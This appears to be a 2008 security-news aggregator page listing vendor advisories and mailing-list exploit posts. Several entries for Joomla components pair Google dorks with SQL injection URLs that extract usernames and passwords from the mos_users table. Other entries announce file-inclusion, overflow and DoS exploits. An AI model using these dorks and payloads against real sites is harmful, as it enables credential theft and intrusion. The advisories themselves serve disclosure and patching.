Hackers spread malware with 'Hilary Clinton' spam

 ( 644 days 3 hours ago)

Although cybercriminals are sending out spam that tricks users into downloading a Trojan horse posing as a video of Sen. Hillary Rodham Clinton, few exploits targeting the U.S. presidential campaign have appeared so far, security experts said.

Re: artmedic_weblog Cross Site Scriptting Vulnerbility

 ( 644 days 3 hours ago)

already found few days ago

[ MDVSA-2008:046 ] - Updated xine-lib package fixes arbitrary code execution vulnerability

 ( 644 days 3 hours ago)

Mandriva Linux Security Advisory MDVSA-2008:046 Package : xine-lib Date : February 15, 2008 Affected: 2007.1, 2008.0 Problem Description: An array index vulnerability found in the FLAC audio demuxer might allow remote attackers to execute arbitrary code via a crafted FLAC ...

rPSA-2008-0059-1 openldap openldap-clients openldap-servers

 ( 644 days 3 hours ago)

rPath Security Advisory: 2008-0059-1 Published: 2008-02-12 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Major Exposure Level Classification: Local Deterministic Denial of Service Updated Versions: openldap=conary.rpath.comatrpl:1/2.2.26-8.8-1 openldap-clients=conary.rpath.comatrpl:1/2.2.26-8.8-1 openldap-servers=conary.rpath.comatrpl:1/2.2.26-8.8-1 rPath Issue Tracking System: References: Description: ...

Re: rPSA-2008-0052-1 kernel

 ( 644 days 3 hours ago)

All sysop must consider this advisory!!! Tested and really dangerous! >From kernel 2.6.17 - 2.6.24 Greetz. On Tue, 2008-02-12 at 11:28 -0500, rPath Update Announcements wrote: > rPath Security Advisory: 2008-0052-1 > Published: 2008-02-12 > Products: > rPath Linux 1 ...

rPSA-2008-0056-1 mailman

 ( 644 days 3 hours ago)

rPath Security Advisory: 2008-0056-1 Published: 2008-02-15 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Weakness Updated Versions: mailman=conary.rpath.comatrpl:1/2.1.9-4.2-1 rPath Issue Tracking System: References: Description: Previous versions of the mailman package contain weaknesses that enable ...

Simple Forum Version 1.7-1.9(pagename)

 ( 644 days 3 hours ago)

# # Simple Forum Version 1.7-1.9(pagename) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: "index.php?pagename"forum # # DORK 2 : Simple Forum - Version 1.7 Simple Forum - Version 1.9 # EXPLOIT : ...

Re: ACER Travelmate 600 and 800 series - Smartcard flawed Implementation

 ( 644 days 3 hours ago)

Also tried windows xp, program version 1.1.3a and none of those hacks worked. Fortunately. :)

Re: Apache web server 2.2: htpasswd predictable salt weakness

 ( 644 days 3 hours ago)

On Fri, Feb 15, 2008 at 08:44:08PM 0300, 3APA3A wrote: > PW> As a result: > PW> - Salts created by htpasswd are very predictable. > PW> - The universe of salts for htpasswd is far less than the MD5 algorithm ...

all version Wordpress FORUM S@L injection

 ( 644 days 3 hours ago)

# # Wordpress FORUM ALL VERSİON SQL Injection # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # # DORK 1 : allinurl: forum pageid "topic" # # DORK 2 : allinurl: pageid "topic" # admin pass and name small soo ...

joomla faq SQL Injection

 ( 644 days 3 hours ago)

allinurl :"index.php?option=faq task" index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mosusers/*

joomla com_activities sql injection

 ( 644 days 3 hours ago)

allinurl :"comactivities" index.php?option=comactivities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,username/**/from/**/mosusers/*

[ GLSA 200802-08 ] Boost: Denial of Service

 ( 644 days 3 hours ago)

- - Gentoo Linux Security Advisory GLSA 200802-08 - - - - Severity: Normal Title: Boost: Denial of Service Date: February 14, 2008 Bugs: #205955 ID: 200802-08 - - Synopsis Two vulnerabilities have been reported in Boost, each one possibly ...

Re: [Full-disclosure] rPSA-2008-0052-1 kernel

 ( 644 days 3 hours ago)

Salut, gregory, On Wed, 13 Feb 2008 10:20:51 0100, gregory wrote: > All sysop must consider this advisory!!! > > Tested and really dangerous! ...and ancient. Fixed a while ago. Milw0rm had it a day after it was ...

Ecommerce Websites from b1st.com SQL Injection

 ( 644 days 3 hours ago)

# # Ecommerce Websites from b1st.com SQL Injection # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : "Ecommerce Websites from b1st.com" # # DORK 2 : allinurl: # EXPLOİT WORKİNG ON HTML SİTES ...

joomla "com_smslist" sql injecton

 ( 644 days 3 hours ago)

# # # AUTHOR : SatBUN # # HOME : # DorK 1 : allinurl: "comsmslist" EXPLOIT : index.php?option=comsmslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mosusers/*

Slackware: apache

 ( 644 days 6 hours ago)

LinuxSecurity.com: New apache 1.3.41 packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0 to fix security issues. A new matching mod_ssl package is also provided. More details about the issues may be found in the Common Vulnerabilities and Exposures (CVE) database:

Slackware: httpd

 ( 644 days 6 hours ago)

LinuxSecurity.com: New httpd packages are available for Slackware 12.0, and -current to fix security issues. More details about this issue may be found in the Common Vulnerabilities and Exposures (CVE) database:

Slackware: php

 ( 644 days 6 hours ago)

LinuxSecurity.com: New php-4.4.8 packages are available for Slackware 10.2 and 11.0 to fix security issues. More details about the issues may be found here: [ >>> ]

Mandriva: Updated MPlayer packages fix a few vulnerabilities

 ( 644 days 6 hours ago)

LinuxSecurity.com: Heap-based buffer overflow in the rmff_dump_cont function in input/libreal/rmff.c in xine-lib 1.1.9 and earlier allows remote attackers to execute arbitrary code via the SDP Abstract attribute, related to the rmff_dump_header function and related to disregarding the max field. Although originally a xine-lib issue, also affects MPlayer due to code similarity. (CVE-2008-0225)

Gentoo: Boost Denial of Service

 ( 644 days 6 hours ago)

LinuxSecurity.com: Tavis Ormandy and Will Drewry from the Google Security Team reported a failed assertion in file regex/v4/perl_matcher_non_recursive.hpp (CVE-2008-0171) and a NULL pointer dereference in function get_repeat_type() file basic_regex_creator.hpp (CVE-2008-0172) when processing regular expressions. Two vulnerabilities have been reported in Boost, each one possibly resulting in a Denial of Service.

UniversalFtp Server 1.0.44 Multiple Remote Denial of service

 ( 644 days 21 hours ago)

# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service # #@nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint . # # # Réponse:226 Completed... ...

scribe 0.2 local file inclusion vulnerability

 ( 644 days 21 hours ago)

scribe 0.2 local file inclusion vulnerability download author muuratsalo contact muuratsalo[at]gmail.com exploit

DOINGSOFT-2008-02-11-002 IP Diva VPN SSL many XSS attacks

 ( 644 days 21 hours ago)

ID : DOINGSOFT-2008-02-11-002 Discovered : 15/10/2007 Corrected : not knowned, vendors did not response to mail since Decembre 2007 Publication :11/02/2008 Credits : Ha.ckers.fr Team Affected Software : IPDiva VPNSSL Versions : * 2.2 branch < 2.2.8.84 * 2.3 branch < 2.3.2.14 ...

Re: UniversalFtp Server 1.0.44 Multiple Remote Denial of service

 ( 644 days 21 hours ago)

There's allready an advisory for : Universalftp But there's a couple mores CMD FTP vulnerable added to this one . Regards

PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability

 ( 644 days 21 hours ago)

PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability download author muuratsalo contact muuratsalo[at]gmail.com exploit

DOINGSOFT-2008-02-11 - IPDiva VPN SSL Brute force attack

 ( 644 days 21 hours ago)

ID : DOINGSOFT-2008-02-11-001 Discovered : 15/10/2007 Corrected : 15/11/2007 Publication :11/02/2008 Affected Software : IPDiva VPNSSL Versions : Users who autenticate with login et passwd without OTP systems * 2.2 branch < 2.2.8.84 * 2.3 branch < 2.3.2.14 Vulnerability : Brute force attack Description : ...

Rosoft Media Player 4.1.8 Buffer Overflow ( .M3U)

 ( 644 days 21 hours ago)

#Rosoft Media Player 4.1.8 Buffer Overflow (.M3U) # # @nolife : Pow...Pow ..If you are kind i'll show my set of supers mega Tools, fuzzers ,and all the automated stuff i use For M3U/ASX/PLS Pow..Pow ... # Nolifing is actually a Disease... Do not be mean with nolife's # # ...

FreeBSD Security Advisory FreeBSD-SA-08:04.ipsec

 ( 644 days 21 hours ago)

FreeBSD-SA-08:04.ipsec Security Advisory The FreeBSD Project Topic: IPsec null pointer dereference panic Category: core Module: ipsec Announced: 2008-02-14 Credits: Takashi Sogabe, Tatuya Jinmei Affects: FreeBSD 5.5 Corrected: 2008-02-14 11:49:39 UTC (RELENG5, 5.5-STABLE) 2008-02-14 11:50:28 UTC (RELENG55, 5.5-RELEASE-p19) CVE Name: CVE-2008-0177 ...